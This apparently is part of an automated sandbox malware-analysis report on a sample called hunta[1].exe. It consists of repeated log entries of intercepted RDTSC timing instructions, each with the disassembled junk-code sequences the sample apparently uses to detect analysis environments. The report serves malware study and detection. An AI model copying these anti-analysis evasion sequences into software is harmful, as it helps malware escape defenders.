Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 116EB0E second address: 116EB24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF2E55A2C26h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 116EB24 second address: 116EB36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2E5514DEDh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 116EB36 second address: 116EB3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 116EC38 second address: 116EC51 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF2E5514DF1h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1170CD1 second address: 1170CDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1170CDE second address: 1170CE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1170CE2 second address: 1170CE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1170CE6 second address: 1170CF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 113E585 second address: 113E58B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1139529 second address: 113952D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1174B74 second address: 1174B8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1174B8D second address: 1174B9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1174B9D second address: 1174BB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2E55A2C2Bh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1174BB1 second address: 1174BB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1174BB7 second address: 1174BC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1174D1A second address: 1174D26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007FF2E5514DE6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1174D26 second address: 1174D5F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 js 00007FF2E55A2C26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007FF2E55A2C41h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 jnc 00007FF2E55A2C26h 0x0000001d pop ebx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11785CF second address: 11785EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 117889D second address: 11788AE instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF2E55A2C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11788AE second address: 11788B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 117897D second address: 1178982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1178982 second address: 1178987 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1178987 second address: 1178995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1178B17 second address: 1178B27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 117BA2F second address: 117BA37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 117BA37 second address: 117BA80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 movzx esi, ax 0x0000000c push 00000000h 0x0000000e or si, ABC4h 0x00000013 push edx 0x00000014 sub edi, dword ptr [ebp+122D2232h] 0x0000001a pop edi 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007FF2E5514DE8h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 0000001Ah 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 push eax 0x00000038 jo 00007FF2E5514DEEh 0x0000003e push esi 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 117CC1E second address: 117CC22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 117C293 second address: 117C297 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 117CC22 second address: 117CC38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 117C297 second address: 117C2A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 117C2A1 second address: 117C2A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 117C2A5 second address: 117C2B3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 117D4E8 second address: 117D4EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 117C2B3 second address: 117C2B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 117D85D second address: 117D86B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 117C2B7 second address: 117C2BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 117D86B second address: 117D870 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 117F7ED second address: 117F7F7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF2E5514DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 117F52B second address: 117F53D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF2E55A2C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007FF2E55A2C2Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 117F7F7 second address: 117F81C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF2E5514DEEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1180316 second address: 118031C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 118031C second address: 1180321 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1182CE4 second address: 1182D2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 and di, 836Ah 0x0000000d and ebx, 61A24A19h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007FF2E55A2C28h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f mov ebx, ecx 0x00000031 mov dword ptr [ebp+1244C063h], edi 0x00000037 push 00000000h 0x00000039 mov bl, 7Eh 0x0000003b push eax 0x0000003c push esi 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1185B82 second address: 1185B86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1185B86 second address: 1185B9D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF2E55A2C2Bh 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1185B9D second address: 1185BAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007FF2E5514DE6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1185BAC second address: 1185C00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007FF2E55A2C28h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 movsx edi, dx 0x00000025 push 00000000h 0x00000027 sub dword ptr [ebp+122D1F90h], ecx 0x0000002d push 00000000h 0x0000002f clc 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FF2E55A2C38h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1182F2A second address: 1182F41 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF2E5514DECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1185DAD second address: 1185DB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1182F41 second address: 1182F45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1182F45 second address: 1182F4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1185DB3 second address: 1185E43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FF2E5514DE6h 0x00000009 jmp 00007FF2E5514DF0h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 call 00007FF2E5514DECh 0x00000017 mov ebx, 48FACC06h 0x0000001c pop ebx 0x0000001d push dword ptr fs:[00000000h] 0x00000024 push edi 0x00000025 pop ebx 0x00000026 mov dword ptr fs:[00000000h], esp 0x0000002d push 00000000h 0x0000002f push eax 0x00000030 call 00007FF2E5514DE8h 0x00000035 pop eax 0x00000036 mov dword ptr [esp+04h], eax 0x0000003a add dword ptr [esp+04h], 0000001Dh 0x00000042 inc eax 0x00000043 push eax 0x00000044 ret 0x00000045 pop eax 0x00000046 ret 0x00000047 mov eax, dword ptr [ebp+122D00B9h] 0x0000004d mov ebx, dword ptr [ebp+122D2A05h] 0x00000053 push FFFFFFFFh 0x00000055 pushad 0x00000056 xor bx, 9051h 0x0000005b mov dl, ADh 0x0000005d popad 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007FF2E5514DF0h 0x00000068 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1187A68 second address: 1187AE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b jmp 00007FF2E55A2C2Eh 0x00000010 pop ebx 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007FF2E55A2C28h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c jmp 00007FF2E55A2C35h 0x00000031 push 00000000h 0x00000033 or dword ptr [ebp+122D2387h], eax 0x00000039 push 00000000h 0x0000003b mov ebx, eax 0x0000003d xchg eax, esi 0x0000003e jng 00007FF2E55A2C2Ch 0x00000044 pushad 0x00000045 push ecx 0x00000046 pop ecx 0x00000047 push edi 0x00000048 pop edi 0x00000049 popad 0x0000004a push eax 0x0000004b pushad 0x0000004c pushad 0x0000004d push ecx 0x0000004e pop ecx 0x0000004f pushad 0x00000050 popad 0x00000051 popad 0x00000052 pushad 0x00000053 pushad 0x00000054 popad 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1185E43 second address: 1185E49 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1185E49 second address: 1185E4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1185E4F second address: 1185E53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1188A09 second address: 1188A2D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF2E55A2C32h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007FF2E55A2C28h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1188A2D second address: 1188A33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1188A33 second address: 1188A98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007FF2E55A2C28h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 pushad 0x00000029 mov bx, si 0x0000002c sub dword ptr [ebp+122D2173h], edx 0x00000032 popad 0x00000033 push 00000000h 0x00000035 mov edi, dword ptr [ebp+122D2931h] 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FF2E55A2C2Eh 0x00000043 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1187BF6 second address: 1187BFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1187BFB second address: 1187C91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jng 00007FF2E55A2C26h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007FF2E55A2C28h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 mov edi, dword ptr [ebp+122D2A31h] 0x0000002f or ebx, 2D33E831h 0x00000035 push dword ptr fs:[00000000h] 0x0000003c mov di, FF36h 0x00000040 mov dword ptr fs:[00000000h], esp 0x00000047 mov bl, FBh 0x00000049 jmp 00007FF2E55A2C33h 0x0000004e mov eax, dword ptr [ebp+122D09EDh] 0x00000054 movzx ebx, di 0x00000057 push FFFFFFFFh 0x00000059 mov ebx, dword ptr [ebp+122D29E9h] 0x0000005f jmp 00007FF2E55A2C2Dh 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007FF2E55A2C36h 0x0000006c rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1189B93 second address: 1189B97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1189B97 second address: 1189C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov di, CDE4h 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007FF2E55A2C28h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 mov ebx, dword ptr [ebp+122D270Eh] 0x0000002e mov ebx, dword ptr [ebp+122D2975h] 0x00000034 or edi, dword ptr [ebp+122D20DDh] 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push eax 0x0000003f call 00007FF2E55A2C28h 0x00000044 pop eax 0x00000045 mov dword ptr [esp+04h], eax 0x00000049 add dword ptr [esp+04h], 00000015h 0x00000051 inc eax 0x00000052 push eax 0x00000053 ret 0x00000054 pop eax 0x00000055 ret 0x00000056 jno 00007FF2E55A2C2Ch 0x0000005c push eax 0x0000005d push ecx 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007FF2E55A2C30h 0x00000065 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 118AC0C second address: 118AC78 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 clc 0x00000009 push 00000000h 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007FF2E5514DE8h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 stc 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push edi 0x0000002b call 00007FF2E5514DE8h 0x00000030 pop edi 0x00000031 mov dword ptr [esp+04h], edi 0x00000035 add dword ptr [esp+04h], 0000001Ch 0x0000003d inc edi 0x0000003e push edi 0x0000003f ret 0x00000040 pop edi 0x00000041 ret 0x00000042 jg 00007FF2E5514DECh 0x00000048 xchg eax, esi 0x00000049 pushad 0x0000004a push edx 0x0000004b push ecx 0x0000004c pop ecx 0x0000004d pop edx 0x0000004e pushad 0x0000004f je 00007FF2E5514DE6h 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 118CCB1 second address: 118CD17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FF2E55A2C26h 0x00000009 jp 00007FF2E55A2C26h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 je 00007FF2E55A2C3Dh 0x00000019 js 00007FF2E55A2C37h 0x0000001f jmp 00007FF2E55A2C31h 0x00000024 nop 0x00000025 mov edi, ecx 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push edi 0x0000002c call 00007FF2E55A2C28h 0x00000031 pop edi 0x00000032 mov dword ptr [esp+04h], edi 0x00000036 add dword ptr [esp+04h], 00000015h 0x0000003e inc edi 0x0000003f push edi 0x00000040 ret 0x00000041 pop edi 0x00000042 ret 0x00000043 mov di, C1C1h 0x00000047 sbb bl, FFFFFFFCh 0x0000004a push 00000000h 0x0000004c mov ebx, 5DFAFA11h 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 118CD17 second address: 118CD2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2E5514DF0h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 118CD2C second address: 118CD31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 118DBBC second address: 118DC12 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 mov ebx, 7CCC69DDh 0x0000000d push 00000000h 0x0000000f mov edi, dword ptr [ebp+122D2A85h] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007FF2E5514DE8h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 0000001Bh 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 jmp 00007FF2E5514DF7h 0x00000036 xchg eax, esi 0x00000037 pushad 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 118DC12 second address: 118DC38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007FF2E55A2C34h 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 118DC38 second address: 118DC3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
